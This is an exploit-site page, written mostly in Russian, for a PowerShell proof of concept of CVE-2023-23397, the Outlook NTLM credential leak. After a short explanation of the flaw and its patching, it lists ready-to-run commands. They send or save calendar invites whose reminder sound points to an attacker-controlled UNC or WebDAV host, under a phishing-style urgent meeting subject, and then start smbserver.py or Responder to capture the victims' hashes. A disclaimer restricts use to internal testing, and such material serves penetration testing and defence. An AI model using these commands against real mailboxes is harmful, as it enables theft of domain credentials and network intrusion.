Share 
## https://sploitus.com/exploit?id=DFB37892-5E08-5EB4-BAFA-C8B0A6467469
# CVE-2023-23397-PoC-PowerShell
**POC for CVE-2023-23397**

ΠšΡ€ΠΈΡ‚ΠΈΡ‡Π΅ΡΠΊΠ°Ρ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π½Π°Π±ΠΎΡ€Π΅ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ Microsoft Outlook 365 Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ Π² Π΄ΠΈΠΊΠΎΠΉ ΠΏΡ€ΠΈΡ€ΠΎΠ΄Π΅ ΠΈ Ρ‚Ρ€Π΅Π±ΡƒΠ΅Ρ‚ срочного исправлСния. Ошибка CVE-2023-23397 с Ρ€Π΅ΠΉΡ‚ΠΈΠ½Π³ΠΎΠΌ CVSS 9.8, позволяСт ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌΡƒ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΡƒ, Π½Π΅ ΠΏΡ€ΠΎΡˆΠ΅Π΄ΡˆΠ΅ΠΌΡƒ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΡƒ подлинности, Π²Π·Π»ΠΎΠΌΠ°Ρ‚ΡŒ систСмы, просто ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΠ² ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ созданноС элСктронноС письмо, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ создаст условия для ΠΊΡ€Π°ΠΆΠΈ ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ… получатСля.

Π’ ситуации, ΠΊΠΎΠ³Π΄Π° Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΈΠΌΠ΅Π΅Ρ‚ доступ ΠΊ локальной сСти ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹, Ρ‚Π°ΠΊΠΆΠ΅ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ прямоС использованиС Ρ…ΡΡˆΠ° NTLMv2 для Π²Ρ…ΠΎΠ΄Π° Π² Π΄Ρ€ΡƒΠ³ΠΈΠ΅ сСрвисы Π±Π΅Π· нСобходимости Π΅Π³ΠΎ Π²Π·Π»ΠΎΠΌΠ°. Для провСдСния Π°Ρ‚Π°ΠΊΠΈ ΠΆΠ΅Ρ€Ρ‚Π²Π΅ достаточно ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ элСктронноС письмо, содСрТащСС ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ созданноС событиС калСндаря ΠΈΠ»ΠΈ Π·Π°Π΄Π°Ρ‡Ρƒ, которая Π±ΡƒΠ΄Π΅Ρ‚ ΡΡΡ‹Π»Π°Ρ‚ΡŒΡΡ Π½Π° ΠΏΡƒΡ‚ΡŒ UNC, ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΠΈΡ€ΡƒΠ΅ΠΌΡ‹ΠΉ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠΌ. ВзаимодСйствиС с ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΌ Π½Π΅ трСбуСтся. Атака ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ осущСствлСна дистанционно.
ΠŸΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹ΠΉ Π΄ΠΎΠΌΠ΅Π½Π½Ρ‹ΠΉ ΠΏΠ°Ρ€ΠΎΠ»ΡŒ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ для Π²Ρ…ΠΎΠ΄Π° Π² Π΄Ρ€ΡƒΠ³ΠΈΠ΅ общСдоступныС сСрвисы ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, VPN. Если двухфакторная аутСнтификация Π½Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ, это ΠΌΠΎΠΆΠ΅Ρ‚ привСсти ΠΊ Ρ‚ΠΎΠΌΡƒ, Ρ‡Ρ‚ΠΎ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ доступ ΠΊ ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½ΠΎΠΉ сСти.

**ВсС вСрсии Microsoft Outlook для ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΡ‹ Windows уязвимы** ΠΈ спСциалисты Ρ€Π΅ΠΊΠΎΠΌΠ΅Π½Π΄ΡƒΡŽΡ‚ Π½Π΅ΠΌΠ΅Π΄Π»Π΅Π½Π½ΠΎ ΠΎΠ±Π½ΠΎΠ²ΠΈΡ‚ΡŒ ΠΊΠ»ΠΈΠ΅Π½Ρ‚Ρ‹ Outlook Π² соотвСтствии с рСкомСндациями. Π’ Π΄ΠΎΠΏΠΎΠ»Π½Π΅Π½ΠΈΠΈ Microsoft выпустила сцСнарий Powershell, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ позволяСт ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΡ‚ΡŒ, ΠΏΠΎΠ»ΡƒΡ‡Π°Π»ΠΈ Π»ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Π² вашСй ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ сообщСния, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰ΠΈΠ΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ.

Если инструмСнт ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Ρ‹ с внСшними UNC-путями, Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ, ваша компания ΠΏΠΎΠ΄Π²Π΅Ρ€Π³Π»Π°ΡΡŒ Π°Ρ‚Π°ΠΊΠ΅ ΠΈ Π½Π΅ лишним Π±ΡƒΠ΄Π΅Ρ‚ Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ этим инструмСнтом администраторам сСрвСров Exchange. Π”ΠΎΠΏΠΎΠ΄Π»ΠΈΠ½Π½ΠΎ извСстно, Ρ‡Ρ‚ΠΎ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ использовалась Π² Π°Ρ‚Π°ΠΊΠ°Ρ… ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· APT-Π³Ρ€ΡƒΠΏΠΏΠΈΡ€ΠΎΠ²ΠΎΠΊ ΠΊΠ°ΠΊ ΠΌΠΈΠ½ΠΈΠΌΡƒΠΌ с апрСля 2022 Π³ΠΎΠ΄Π°, Π° учитывая, Ρ‡Ρ‚ΠΎ Π΄Π΅Ρ‚Π°Π»ΠΈ уязвимости ΡƒΠΆΠ΅ описаны ΠΏΡƒΠ±Π»ΠΈΡ‡Π½ΠΎ оТидаСтся рост массовых Π°Ρ‚Π°ΠΊ с Π΅Π΅ использованиСм Π² блиТайшиС врСмя.

Π Π°Π·Π±ΠΎΡ€ Ρ‡ΠΈΡ‚Π°Ρ‚ΡŒ Ρ‚ΡƒΡ‚ https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

**!Π”Π°Π½Π½Ρ‹ΠΉ скрипт Π½Π΅ ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ для нанСсСния Π²Ρ€Π΅Π΄Π°, Ρ‚ΠΎΠ»ΡŒΠΊΠΎ для ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ работоспособности уязвимости Π²Π½ΡƒΡ‚Ρ€ΠΈ Π’Π°ΡˆΠ΅ΠΉ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ!**

**Sending:**
```
Send-CalendarNTLMLeak -recipient "a.galichev@domain.kz" -remotefilepath "\\XX.XX.XX.XX\notexists\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
Send-CalendarNTLMLeak -recipient "a.galichev@domain.kz" -remotefilepath "\\fakeserver.domain.local\notexists\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
Send-CalendarNTLMLeak -recipient "a.galichev@domain.kz" -remotefilepath "\\fakeserver.domain.local@80\notexists\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
Send-CalendarNTLMLeak -recipient "a.galichev@domain.kz" -remotefilepath "\\fakeserver.domain.local@SSL@443\notexists\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
```
**Saving:**
```
Save-CalendarNTLMLeak -remotefilepath "\\XX.XX.XX.XX\notexists\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
Save-CalendarNTLMLeak -remotefilepath "\\fakeserver.domain.local\notexists\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
Save-CalendarNTLMLeak -remotefilepath "\\fakeserver.domain.local@80\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
Save-CalendarNTLMLeak -remotefilepath "\\fakeserver.domain.local@SSL@443\sound.wav" -meetingsubject "Π‘Ρ€ΠΎΡ‡Π½ΠΎ! ΠœΠΈΡ‚ΠΈΠ½Π³ с Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»Π΅ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ" -meetingbody "Вас Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ ΠΆΠ°Ρ…Π½ΡƒΠ»ΠΈ, Π’Π°ΡˆΠΈ Ρ…Π΅ΡˆΠΈ ΠΏΡ€ΠΎΡ‚Π΅ΠΊΠ»ΠΈ..."
```
**Listening:**
```
sudo smbserver.py -smb2support smb ./smb
//or
sudo python3 Responder.py -i XX.XX.XX.XX -I utun5 -wPv
```